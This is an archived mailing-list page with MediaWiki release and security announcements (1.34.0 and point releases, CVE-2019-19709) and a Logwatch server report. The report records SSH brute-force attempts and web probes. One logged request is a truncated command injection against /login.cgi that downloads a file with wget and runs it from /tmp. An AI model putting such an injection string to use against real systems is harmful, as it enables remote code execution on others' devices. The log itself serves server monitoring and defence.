MediaWiki announcements mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce

5 Jahre, 10 Monate

1
0
0 / 0

[MediaWiki-announce] Announcing MediaWiki 1.34.0

by Sam Reed

I am happy to announce the availability of the general release of MediaWiki 1.34! While tarballs have already been uploaded, git tags will follow later on today. Thanks to everyone who helped out with this release, especially thanks to those who tested out the release candidates and provided feedback, as well as the developers who worked hard to get several important fixes merged in time for the 1.34 final release. To see what's changed in 1.34, see the release notes below. Please note that MediaWiki 1.34 no longer supports HHVM, and also the PHP version requirement has been raised from 7.0.13 in MediaWiki 1.33, to 7.2.9. As per the pre-release announcement, 1.34.0 includes some security fixes that weren't in 1.34.0-rc.0 or 1.34.0-rc.1. == Security fixes == * (T192134) Personal and site-wide CSS and JavaScript is loaded on Special:PasswordReset. * (T239466) Possible to circumvent title-blacklist (CVE-2019-19709). == Links to all mentioned tasks == * https://phabricator.wikimedia.org/T192134 * https://phabricator.wikimedia.org/T239466 MediaWiki 1.34 is due to be supported until the end of November 2020. ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.34/mediawiki-1.34.0.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.34/mediawiki-core-1.34.0.tar.gz Patch to previous version (1.34.0-rc.1): https://releases.wikimedia.org/mediawiki/1.34/mediawiki-1.34.0.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.34/mediawiki-core-1.34.0.tar.g... https://releases.wikimedia.org/mediawiki/1.34/mediawiki-1.34.0.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.34/mediawiki-1.34.0.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html Release Notes https://www.mediawiki.org/wiki/Release_notes/1.34 _______________________________________________ MediaWiki announcements mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce

5 Jahre, 10 Monate

1
0
0 / 0

[MediaWiki-announce] Security and maintenance release: 1.31.6 / 1.32.6 / 1.33.12

by Sam Reed

I would like to announce the release of MediaWiki 1.33.2, 1.32.6 and 1.31.6! These releases also serve as a maintenance release for these branches. While tarballs have already been uploaded, git tags will follow later on today. As a reminder, 1.32.6 will also be the final release for 1.32 (barring any unforeseen issues), which is scheduled to become end of life in January 2020 [1]. If you're using 1.32, it is recommended that you upgrade to the latest point release of the 1.33 branch (1.33.2, to be released tomorrow) or 1.34.0 to carry on using a maintained and supported release. An "MediaWiki Extensions Security Release Supplement" email will follow this one. == Security fixes == * (T192134) Personal and site-wide CSS and JavaScript is loaded on Special:PasswordReset. * (T212067) wfParseUrl() incorrectly parses hostnames in older PHP and HHVM versions due to bug in parse_url(). This is only potentially an issue on MW < 1.34 where it supports PHP version (see PHP bug 73192) 7.0.0–7.0.12, or HHVM less than 3.18.6. * (T239466) Possible to circumvent title-blacklist (CVE-2019-19709). == Links to all mentioned tasks == * https://phabricator.wikimedia.org/T212067 * https://phabricator.wikimedia.org/T239466 * https://phabricator.wikimedia.org/T192134 * https://bugs.php.net/bug.php?id=73192 == Release notes == Full release notes for 1.31.6: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_31/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.31 Full release notes for 1.32.6: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_32/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.32 Full release notes for 1.33.2: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_33/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.33 For information about how to upgrade, see <https://www.mediawiki.org/wiki/Manual:Upgrading> ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.6.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.6.tar.gz Patch to previous version (1.31.5): https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.6.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.6.tar.g... https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.6.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.6.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.32/mediawiki-1.32.6.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.32/mediawiki-core-1.32.6.tar.gz Patch to previous version (1.32.5): https://releases.wikimedia.org/mediawiki/1.32/mediawiki-1.32.6.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.32/mediawiki-core-1.32.6.tar.g... https://releases.wikimedia.org/mediawiki/1.32/mediawiki-1.32.6.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.32/mediawiki-1.32.6.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.33/mediawiki-1.33.2.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.33/mediawiki-core-1.33.2.tar.gz Patch to previous version (1.33.1): https://releases.wikimedia.org/mediawiki/1.33/mediawiki-1.33.2.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.33/mediawiki-core-1.33.2.tar.g... https://releases.wikimedia.org/mediawiki/1.33/mediawiki-1.33.2.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.33/mediawiki-1.33.2.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html _______________________________________________ MediaWiki announcements mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce

5 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Dec 19 04:42:03 2019 Date Range Processed: yesterday ( 2019-Dec-18 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [149:148] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 157.52.156.49 -> zapf.wiki:443: 2 Time(s) 222.186.19.221 -> zapf.wiki:443: 1 Time(s) A total of 2 sites probed the server 62.210.77.54 66.240.192.138 Requests with error response codes 400 Bad Request mstshash=Administr: 9 Time(s) null: 7 Time(s) /socket.io/?noteId=Dvll-V5GR7CGvuqIIyKt1g& ... BjySluNBKSBAAlm: 3 Time(s) zapf.wiki:443: 3 Time(s) /: 2 Time(s) /manager/html: 2 Time(s) ../../: 1 Time(s) /?0628182016134805143312: 1 Time(s) /login.cgi?cli=aa%20aa%27;wget%20http://54 ... h%20/tmp/kh%27$: 1 Time(s) /socket.io/?noteId=Dvll-V5GR7CGvuqIIyKt1g& ... fbW1Z8GlgmbAAwS: 1 Time(s) 403 Forbidden /resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s) 404 Not Found /robots.txt: 25 Time(s) /berlin/apple-touch-icon.png: 6 Time(s) /reader/2017_SoSe_Berlin_vorlaeufig.pdf%7C: 1 Time(s) /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s) 500 Internal Server Error /: 89 Time(s) /HNAP1: 2 Time(s) /evox/about: 2 Time(s) /sdk: 2 Time(s) /_VTI_BIN/WSTS: 1 Time(s) /cgi-bin/config.exp: 1 Time(s) /manager/html: 1 Time(s) /nmaplowercheck1576675640: 1 Time(s) /nmaplowercheck1576676504: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.175.202): 42 Time(s) root (222.186.175.167): 41 Time(s) root (222.186.169.194): 39 Time(s) root (222.186.175.148): 36 Time(s) root (222.186.173.154): 35 Time(s) root (222.186.175.150): 34 Time(s) root (222.186.180.9): 30 Time(s) root (218.92.0.145): 29 Time(s) root (222.186.173.183): 29 Time(s) root (222.186.190.92): 29 Time(s) root (222.186.180.17): 26 Time(s) root (222.186.175.147): 25 Time(s) root (49.88.112.62): 25 Time(s) root (222.186.169.192): 24 Time(s) root (222.186.173.226): 24 Time(s) root (222.186.175.216): 24 Time(s) root (222.186.180.41): 24 Time(s) root (218.92.0.148): 23 Time(s) root (222.186.173.180): 21 Time(s) root (222.186.175.155): 19 Time(s) root (222.186.175.140): 18 Time(s) root (222.186.175.181): 18 Time(s) root (222.186.175.212): 18 Time(s) root (222.186.175.217): 18 Time(s) root (222.186.175.220): 18 Time(s) root (49.88.112.59): 18 Time(s) root (218.92.0.212): 17 Time(s) root (222.186.173.142): 17 Time(s) root (222.186.173.215): 17 Time(s) root (222.186.175.154): 17 Time(s) root (222.186.180.223): 17 Time(s) root (218.92.0.141): 12 Time(s) root (218.92.0.165): 12 Time(s) root (222.186.175.161): 12 Time(s) root (222.186.175.182): 12 Time(s) root (222.186.175.183): 12 Time(s) root (222.186.42.4): 12 Time(s) root (49.88.112.61): 12 Time(s) root (112.85.42.181): 11 Time(s) root (218.92.0.155): 11 Time(s) root (218.92.0.179): 11 Time(s) root (222.186.175.151): 11 Time(s) root (222.186.175.215): 11 Time(s) root (222.186.180.6): 11 Time(s) root (222.186.173.238): 10 Time(s) root (112.85.42.176): 6 Time(s) root (112.85.42.182): 6 Time(s) root (218.92.0.134): 6 Time(s) root (218.92.0.164): 6 Time(s) root (218.92.0.170): 6 Time(s) root (218.92.0.172): 6 Time(s) root (222.186.175.163): 6 Time(s) root (222.186.175.169): 6 Time(s) root (61.177.172.128): 6 Time(s) root (78-106-88-124.broadband.corbina.ru): 6 Time(s) root (78.178.159.31): 6 Time(s) root (218.92.0.175): 5 Time(s) root (222.186.180.147): 5 Time(s) root (222.186.190.2): 5 Time(s) unknown (27.78.12.22): 5 Time(s) root (218.92.0.178): 4 Time(s) unknown (27.78.14.83): 4 Time(s) postgres (61.177.139.213): 1 Time(s) root (101.255.130.114): 1 Time(s) root (109.110.52.77): 1 Time(s) root (112.175.232.155): 1 Time(s) root (113.160.178.148): 1 Time(s) root (117.232.127.50): 1 Time(s) root (162.ip-54-37-205.eu): 1 Time(s) root (167.99.75.174): 1 Time(s) root (178.128.158.113): 1 Time(s) root (180.100.212.73): 1 Time(s) root (203.163.231.139): 1 Time(s) root (27.78.14.83): 1 Time(s) root (47.30.153.37): 1 Time(s) root (58.22.99.135): 1 Time(s) root (71.227.197.35.bc.googleusercontent.com): 1 Time(s) root (78.90.67.126): 1 Time(s) root (kch-106-33.tm.net.my): 1 Time(s) root (ns3045583.ip-46-105-122.eu): 1 Time(s) unknown (112.78.1.247): 1 Time(s) unknown (113.160.37.4): 1 Time(s) unknown (122.161.198.205): 1 Time(s) unknown (139.59.78.236): 1 Time(s) unknown (149.255.200.56): 1 Time(s) unknown (159.203.77.51): 1 Time(s) unknown (171.49.177.191): 1 Time(s) unknown (178.22.45.33): 1 Time(s) unknown (180.242.235.54): 1 Time(s) unknown (181.229.99.61): 1 Time(s) unknown (185.80.130.230): 1 Time(s) unknown (193.254.231.202): 1 Time(s) unknown (206.189.166.172): 1 Time(s) unknown (212.34.246.73): 1 Time(s) unknown (222.239.78.88): 1 Time(s) unknown (255.red-2-139-215.staticip.rima-tde.net): 1 Time(s) unknown (27.34.68.0): 1 Time(s) unknown (45.55.157.147): 1 Time(s) unknown (91.185.193.101): 1 Time(s) unknown (h2410222.stratoserver.net): 1 Time(s) unknown (ip-104-238-116-19.ip.secureserver.net): 1 Time(s) unknown (ip121.ip-188-165-55.eu): 1 Time(s) unknown (mail.bidakarahotel.com): 1 Time(s) unknown (ppp-210-86-171-106.revip.asianet.co.th): 1 Time(s) unknown (vps.waldalbahrain.net): 1 Time(s) Invalid Users: Unknown Account: 34 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 5 Miscellaneous warnings 14.690K Bytes accepted 15,043 14.690K Bytes sent via SMTP 15,043 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 144 Connections 14 Connections lost (inbound) 144 Disconnections 1 Removed from queue 1 Sent via SMTP 5 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Network Read Write Errors: 1 Disconnecting after too many authentication failures for user: root : 170 Time(s) Failed logins from: 27.78.14.83 (localhost): 1 time 35.197.227.71 (71.227.197.35.bc.googleusercontent.com): 1 time 46.105.122.62 (ns3045583.ip-46-105-122.eu): 1 time 47.30.153.37: 1 time 49.88.112.59: 18 times 49.88.112.61: 12 times 49.88.112.62: 25 times 54.37.205.162 (162.ip-54-37-205.eu): 1 time 58.22.99.135: 1 time 61.177.139.213: 1 time 61.177.172.128: 6 times 78.90.67.126: 1 time 78.106.88.124 (78-106-88-124.broadband.corbina.ru): 6 times 78.178.159.31 (78.178.159.31.dynamic.ttnet.com.tr): 6 times 101.255.130.114: 1 time 109.110.52.77: 1 time 112.85.42.176: 6 times 112.85.42.181: 11 times 112.85.42.182: 6 times 112.175.232.155: 1 time 113.160.178.148 (static.vnpt.vn): 1 time 117.232.127.50: 1 time 167.99.75.174: 1 time 178.128.158.113: 1 time 180.100.212.73: 1 time 203.163.231.139: 1 time 218.92.0.134: 6 times 218.92.0.141: 12 times 218.92.0.145: 29 times 218.92.0.148: 23 times 218.92.0.155: 11 times 218.92.0.164: 6 times 218.92.0.165: 12 times 218.92.0.170: 6 times 218.92.0.172: 6 times 218.92.0.175: 5 times 218.92.0.178: 4 times 218.92.0.179: 11 times 218.92.0.212: 17 times 219.93.106.33 (kch-106-33.tm.net.my): 1 time 222.186.42.4: 12 times 222.186.169.192: 24 times 222.186.169.194: 39 times 222.186.173.142: 17 times 222.186.173.154: 35 times 222.186.173.180: 24 times 222.186.173.183: 29 times 222.186.173.215: 17 times 222.186.173.226: 24 times 222.186.173.238: 10 times 222.186.175.140: 18 times 222.186.175.147: 29 times 222.186.175.148: 36 times 222.186.175.150: 34 times 222.186.175.151: 11 times 222.186.175.154: 17 times 222.186.175.155: 19 times 222.186.175.161: 12 times 222.186.175.163: 6 times 222.186.175.167: 41 times 222.186.175.169: 6 times 222.186.175.181: 18 times 222.186.175.182: 12 times 222.186.175.183: 12 times 222.186.175.202: 42 times 222.186.175.212: 18 times 222.186.175.215: 11 times 222.186.175.216: 24 times 222.186.175.217: 18 times 222.186.175.220: 18 times 222.186.180.6: 11 times 222.186.180.9: 30 times 222.186.180.17: 30 times 222.186.180.41: 24 times 222.186.180.147: 5 times 222.186.180.223: 18 times 222.186.190.2: 5 times 222.186.190.92: 29 times Illegal users from: undef: 13 times 2.139.215.255 (255.red-2-139-215.staticip.rima-tde.net): 1 time 27.34.68.0: 1 time 27.78.12.22 (localhost): 5 times 27.78.14.83 (localhost): 5 times 45.55.157.147: 1 time 85.214.194.182 (h2410222.stratoserver.net): 1 time 91.185.193.101: 1 time 104.238.116.19 (ip-104-238-116-19.ip.secureserver.net): 1 time 112.78.1.247: 1 time 113.160.37.4 (static.vnpt-hanoi.com.vn): 1 time 122.161.198.205 (abts-north-static-205.198.161.122-airtelbroadband.in): 1 time 139.59.78.236: 1 time 149.255.200.56: 1 time 159.203.77.51: 1 time 171.49.177.191 (abts-tn-dynamic-191.177.49.171.airtelbroadband.in): 1 time 178.22.45.33: 1 time 180.242.235.54: 1 time 181.229.99.61 (61-99-229-181.cab.prima.com.ar): 1 time 182.16.179.70 (mail.bidakarahotel.com): 1 time 185.80.130.230: 1 time 188.165.55.121 (ip121.ip-188-165-55.eu): 1 time 193.254.231.202 (unknown.unitbv.ro): 1 time 198.38.88.198 (vps.waldalbahrain.net): 1 time 206.189.166.172: 1 time 210.86.171.106 (ppp-210-86-171-106.revip.asianet.co.th): 1 time 212.34.246.73 (host-73.246.34.212.ucom.am): 1 time 222.239.78.88 (222-239-78-88.youiwe.co.kr): 1 time **Unmatched Entries** error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s) fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 2 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 10 Monate

1
0
0 / 0

[MediaWiki-announce] Security pre-release announcement: 1.30.6 / 1.32.6 / 1.33.2 / 1.34.0

by Sam Reed

Hi all, Tomorrow we will be issuing a security and maintenance release to all supported branches of MediaWiki. It will also coincide with the with formal release of 1.34.0, which has been a little bit delayed due to the US holidays and the Wikimedia Technical Conference whilst the last few couple of outstanding issues could be fixed. It also meant that a followup release to the REL1_34 branch wouldn't be needed only a couple of weeks after the 1.34.0 release was cut. The new releases will be: 1.34.0 1.33.2 1.32.6 1.31.6 This will resolve 1 issue in MediaWiki core (when running on older PHP versions), and also includes some fixes previously committed to git, such as minor security and hardening patches. Fixes will be available in these respective release branches, and also master. Tarballs will be available for the above mentioned point releases as well. 1.32.6 will also be the final release for 1.32 (barring any unforeseen issues), which is scheduled to become end of life in January 2020 [1]. If you're using 1.32, it is recommended that you upgrade to the latest point release of the 1.33 branch (1.33.2, to be released tomorrow) or 1.34.0 to carry on using a maintained and supported release. This security release includes fixes for MediaWiki core. A summary of some of the security fixes that have gone into non bundled MediaWiki extensions will also follow. [1] https://www.mediawiki.org/wiki/Version_lifecycle Thanks! Sam _______________________________________________ MediaWiki announcements mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce

5 Jahre, 10 Monate

1
0
0 / 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

TOPF Dezember 2019